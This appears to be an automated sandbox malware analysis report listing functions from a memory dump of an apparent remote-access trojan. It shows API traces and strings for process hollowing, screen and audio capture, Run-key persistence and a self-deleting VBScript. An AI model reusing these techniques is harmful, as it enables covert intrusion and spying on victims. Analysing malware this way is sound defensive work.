                                      • Instruction Fuzzy Hash: 30324631DA9F114DD7279538D862336A299BFB72C4F15DB27E819B6E96EF28C0C35100
                                      Function 02B1F0FA Relevance: .6, Instructions: 598COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                      • Instruction ID: 7532ae89351abb7a85814034873b4b7b6fd8ca073b6459591548207a3d63baab
                                      • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                      • Instruction Fuzzy Hash: 573215316087459BC729DF28C48077AF7E2FF84318F984AADF8958B691D770E945CB82
                                      Function 02B2739D Relevance: .4, Instructions: 435COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d247a61377a62d72c952db6bc6f9875fc935f9dcc1e367c866125ff8ceeec132
                                      • Instruction ID: 65b643a72b8ecbabee0fb5b719428ca0a041b3b11e59694a53c7b412819e49f0
                                      • Opcode Fuzzy Hash: d247a61377a62d72c952db6bc6f9875fc935f9dcc1e367c866125ff8ceeec132
                                      • Instruction Fuzzy Hash: 5602AE71B546529FC319CF2EE88463AF7E1FB89301708892AE485C7781DB39E536DB90
                                      Function 02B26E0E Relevance: .4, Instructions: 383COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e570f92c357284609a980be02019fd99011731b338006111beeb4d8d7cbc26f
                                      • Instruction ID: 9c9d6d3061982764fbc4d5a677f2e70665d44c171f8799a16978acf7c9eebfd9
                                      • Opcode Fuzzy Hash: 7e570f92c357284609a980be02019fd99011731b338006111beeb4d8d7cbc26f
                                      • Instruction Fuzzy Hash: E9F15A75A542559FC304DF19E49487AB3E5FB89341B484E1EF1C2C72C1CB39EA2ACBA1
                                      Function 02B37D33 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 93baa37b12ed319c9ed2c15812e22d2447eec932d87a87019142a9f73e1e99f6
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: 59C15FB23051930ADB2E463E957463FFBA19B916B531A07DDE8B2CB1D5EF20D124E620
                                      Function 02B38168 Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: b8823ca1a83798918c1794521dcd6b9a4fb49a61935f537a4d17bdc822115302
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: B0C16F723051930ADB6E463E953463FFBA19B926B531A07ADE8B2CB1D5FF20D124D620
                                      Function 02B378FE Relevance: .3, Instructions: 331COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction ID: 939e0542faac49dd1dc4bb8bd67b962a53fd250628b76660d247896f339920b3
                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction Fuzzy Hash: 01C183B23051930ADB2E4A3E957463FFBA19B916B531A17DDD8B2CB1C5FF20D124E620
                                      Function 02B374E6 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 9cca7ac1758a030b338f9b866a1012dd3a806e352a2eedc47982f98f03d27b9f
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 85C171B23051930ADB2E4A3E953463FFBA19B926B531A079DD8B2CB1C5FF20D124E650
                                      Function 02B1DB62 Relevance: .3, Instructions: 277COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                      • Instruction ID: 12fabb1e106c83801f5d433d17781f475d516b7033fe4c67da67c3e094b193f4
                                      • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                      • Instruction Fuzzy Hash: D1B1713911429A8ACB05EF68C4913F63BA1EF6A301F4851B9EC9CCF756D3398506EB64
                                      Function 02B3E2FB Relevance: .2, Instructions: 237COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 300f4d542f4ce60cadd9e2beb82d396481b20e1d499116417427a4376d2d2ac0
                                      • Instruction ID: d62027b37d3359ca3d07ae7c7e47c2e307d1e9ab352a008ad56b87c5b9b59223
                                      • Opcode Fuzzy Hash: 300f4d542f4ce60cadd9e2beb82d396481b20e1d499116417427a4376d2d2ac0
                                      • Instruction Fuzzy Hash: AA616731640709A7DF378A2888947BE3396EF09714F4C84DBE943EB2C0DB51E946CB25
                                      Function 02B3E558 Relevance: .2, Instructions: 237COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71051d3cb7b48ccd195da58da315b806f75ff68e93641cdfbed9c222751f6c59
                                      • Instruction ID: ae13939ccf9f2980802a51ddb4ae147604aaf8df1be8b906edec8509db9a9d2b
                                      • Opcode Fuzzy Hash: 71051d3cb7b48ccd195da58da315b806f75ff68e93641cdfbed9c222751f6c59
                                      • Instruction Fuzzy Hash: 48617B72600709A7DE3B9E688894BBE7395EF41308F0409DBE943DB2D3EB51E942CB55
                                      Function 02B3DE9D Relevance: .2, Instructions: 214COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                      • Instruction ID: 255c7d7e3c407f890ac3cf1b9250131db307d8a28c999ca1ef86767ecaec033b
                                      • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                      • Instruction Fuzzy Hash: 5451466160065B97DF37896C84E57BE7BDAEF12308F0809DFD882CBA81C725EA05C752
                                      Function 02B27BAF Relevance: .2, Instructions: 187COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                      • Instruction ID: 744cdfe66bf09b65b1ad248ee620988c594ce633a31b36e86146607b36411a57
                                      • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                      • Instruction Fuzzy Hash: BC615A329083159FC308DF35D980A5BB7E9EFCC714F550E6EF49996150EB31EA088B86
                                      Function 02B38770 Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: c84850c1d3db9b92134b5e377b6622a268910764d802bd2cdfadf8a8e542b433
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 5011ABBB241141C3D6178A3DD8F86B7B797EBC522972D43FAF0424B758D732B1459602
                                      Function 02B18E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02B18E90
                                      • CreateCompatibleDC.GDI32(00000000), ref: 02B18E9D
                                        • Part of subcall function 02B19325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02B19355
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 02B18F13
                                      • DeleteDC.GDI32(00000000), ref: 02B18F2A
                                      • DeleteDC.GDI32(00000000), ref: 02B18F2D
                                      • DeleteObject.GDI32(00000000), ref: 02B18F30
                                      • SelectObject.GDI32(00000000,00000000), ref: 02B18F51
                                      • DeleteDC.GDI32(00000000), ref: 02B18F62
                                      • DeleteDC.GDI32(00000000), ref: 02B18F65
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 02B18F89
                                      • GetIconInfo.USER32(?,?), ref: 02B18FBD
                                      • DeleteObject.GDI32(?), ref: 02B18FEC
                                      • DeleteObject.GDI32(?), ref: 02B18FF9
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 02B19006
                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 02B1903C
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 02B19068
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 02B190D5
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 02B19144
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B19168
                                      • DeleteDC.GDI32(?), ref: 02B1917C
                                      • DeleteDC.GDI32(00000000), ref: 02B1917F
                                      • DeleteObject.GDI32(00000000), ref: 02B19182
                                      • GlobalFree.KERNEL32(?), ref: 02B1918D
                                      • DeleteObject.GDI32(00000000), ref: 02B19241
                                      • GlobalFree.KERNEL32(?), ref: 02B19248
                                      • DeleteDC.GDI32(?), ref: 02B19258
                                      • DeleteDC.GDI32(00000000), ref: 02B19263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369
                                      • Opcode ID: f9c06c3ec06ea036ecc0f577576b4756730f62a2d04e3d80a1a629e23e1f05fd
                                      • Instruction ID: 69004b9fb78edd7eab1c950f9155ed92b177093cdca5f3ca1c026952b26fc079
                                      • Opcode Fuzzy Hash: f9c06c3ec06ea036ecc0f577576b4756730f62a2d04e3d80a1a629e23e1f05fd
                                      • Instruction Fuzzy Hash: 76C15871508750EFE724DF24D848B6BBBE9FF88750F44485DF98997290DB30A948CBA2
                                      Function 02B180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02B18136
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B18139
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02B1814A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1814D
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 02B1815E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B18161
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 02B18172
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B18175
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02B18217
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02B1822F
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 02B18245
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02B1826B
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02B182ED
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02B18301
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02B18341
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02B1840B
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 02B18428
                                      • ResumeThread.KERNEL32(?), ref: 02B18435
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02B1844C
                                      • GetCurrentProcess.KERNEL32(?), ref: 02B18457
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02B18472
                                      • GetLastError.KERNEL32 ref: 02B1847A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: 56206fbabba9644eaf7926ef6ef3be14387bc2ed019ce577ceae7b148e837e5e
                                      • Instruction ID: 73212370a109cd024fbc9ab5fccc895427b7dd83839cead2fec4280db764a2b4
                                      • Opcode Fuzzy Hash: 56206fbabba9644eaf7926ef6ef3be14387bc2ed019ce577ceae7b148e837e5e
                                      • Instruction Fuzzy Hash: 1FA18DB0A44300EFEB108F64DC89B6ABBE8FF48748F44486AF685D7190D774E814CB56
                                      Function 02B0D420 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B12850: TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                        • Part of subcall function 02B12850: WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02B0D51D
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02B0D530
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02B0D549
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02B0D579
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A27D,00000000,02B752F0,pth_unenc,02B0D0B8,02B752D8,02B752F0,?,pth_unenc), ref: 02B0B8BB
                                        • Part of subcall function 02B0B8AC: UnhookWindowsHookEx.USER32(02B750F0), ref: 02B0B8C7
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A267,00000000,?,pth_unenc), ref: 02B0B8D5
                                        • Part of subcall function 02B1C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02B66468,00000000,00000000,02B0D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02B1C430
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000000), ref: 02B0D7C4
                                      • ExitProcess.KERNEL32 ref: 02B0D7D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                      • API String ID: 1861856835-1536747724
                                      • Opcode ID: da48068ab81794b35736bd9037892dabe0ffe718a8cfc4d94b99bd56f4bc1c97
                                      • Instruction ID: aa2d067832a5f77969cef11efb512e8babeff067f97b761d6427af5e0328e02a
                                      • Opcode Fuzzy Hash: da48068ab81794b35736bd9037892dabe0ffe718a8cfc4d94b99bd56f4bc1c97
                                      • Instruction Fuzzy Hash: FA91D3316142005AD31BF764D8D4AAFBBEEEF95304F4008EDA58A931E1FF649D49CE92
                                      Function 02B12475 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,02B750E4,00000003), ref: 02B12494
                                      • ExitProcess.KERNEL32(00000000), ref: 02B124A0
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02B1251A
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02B12529
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B12534
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1253B
                                      • GetCurrentProcessId.KERNEL32 ref: 02B12541
                                      • PathFileExistsW.SHLWAPI(?), ref: 02B12572
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 02B125D5
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02B125EF
                                      • lstrcatW.KERNEL32(?,.exe), ref: 02B12601
                                        • Part of subcall function 02B1C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02B66468,00000000,00000000,02B0D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02B1C430
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02B12641
                                      • Sleep.KERNEL32(000001F4), ref: 02B12682
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02B12697
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B126A2
                                      • CloseHandle.KERNEL32(00000000), ref: 02B126A9
                                      • GetCurrentProcessId.KERNEL32 ref: 02B126AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: .exe$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-3088914985
                                      • Opcode ID: 43dc7e602cd748f6d0b6da2fa5d2da2f4c241158d591c41468300da43fe1b075
                                      • Instruction ID: f8bfc7794b3f65aa3940e90ee03ac1128a5ae340830ac0688898eecfd8d90cf5
                                      • Opcode Fuzzy Hash: 43dc7e602cd748f6d0b6da2fa5d2da2f4c241158d591c41468300da43fe1b075
                                      • Instruction Fuzzy Hash: D051B2B1E40325AFEB15A7A0AC99FBE376E9B04350F8444D5F902A71C0EF788E45CB90
                                      Function 02B1B047 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02B1B13C
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02B1B150
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02B660A4), ref: 02B1B178
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02B74EE0,00000000), ref: 02B1B18E
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02B1B1CF
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02B1B1E7
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02B1B1FC
                                      • SetEvent.KERNEL32 ref: 02B1B219
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 02B1B22A
                                      • CloseHandle.KERNEL32 ref: 02B1B23A
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02B1B25C
                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02B1B266
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                      • API String ID: 738084811-1354618412
                                      • Opcode ID: 95c2142549c67960bbeb53955957d28361fb9c003ec2068e0aba3003a6ac7916
                                      • Instruction ID: 527195d6f3698a6f661e3cd20e14e46d9caec7bc1ea801992c9f59d3c9ea7fa6
                                      • Opcode Fuzzy Hash: 95c2142549c67960bbeb53955957d28361fb9c003ec2068e0aba3003a6ac7916
                                      • Instruction Fuzzy Hash: 2D51A4716942046AE31AB734DCD9EBF3FAEEB44398F400499B55A871D0EF608D18CE62
                                      Function 02B0D096 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B12850: TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                        • Part of subcall function 02B12850: WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,02B752F0,?,pth_unenc), ref: 02B0D1A5
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02B0D1B8
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,02B752F0,?,pth_unenc), ref: 02B0D1E8
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02B752F0,?,pth_unenc), ref: 02B0D1F7
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A27D,00000000,02B752F0,pth_unenc,02B0D0B8,02B752D8,02B752F0,?,pth_unenc), ref: 02B0B8BB
                                        • Part of subcall function 02B0B8AC: UnhookWindowsHookEx.USER32(02B750F0), ref: 02B0B8C7
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A267,00000000,?,pth_unenc), ref: 02B0B8D5
                                        • Part of subcall function 02B1B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,02B66468,02B0D20D,.vbs,?,?,?,?,?,02B752F0), ref: 02B1B99F
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000000), ref: 02B0D412
                                      • ExitProcess.KERNEL32 ref: 02B0D419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-3018399277
                                      • Opcode ID: 8bfc1608cd313c1001ac2db21ed21db112cafb0819883b16436689828a64b4f1
                                      • Instruction ID: 02030bf3df622036329a93bff0a61ac77c7d63ddaac84f0ce8da8ea0e7b8a62b
                                      • Opcode Fuzzy Hash: 8bfc1608cd313c1001ac2db21ed21db112cafb0819883b16436689828a64b4f1
                                      • Instruction Fuzzy Hash: 7B81F2316143005BD31BF764D8D4AAFBBAEEF95304F4048EDB58A531E0EF649D09CA92
                                      Function 02B01A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02B01AD9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02B01B03
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02B01B13
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02B01B23
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02B01B33
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02B01B43
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02B01B54
                                      • WriteFile.KERNEL32(00000000,02B72AAA,00000002,00000000,00000000), ref: 02B01B65
                                      • WriteFile.KERNEL32(00000000,02B72AAC,00000004,00000000,00000000), ref: 02B01B75
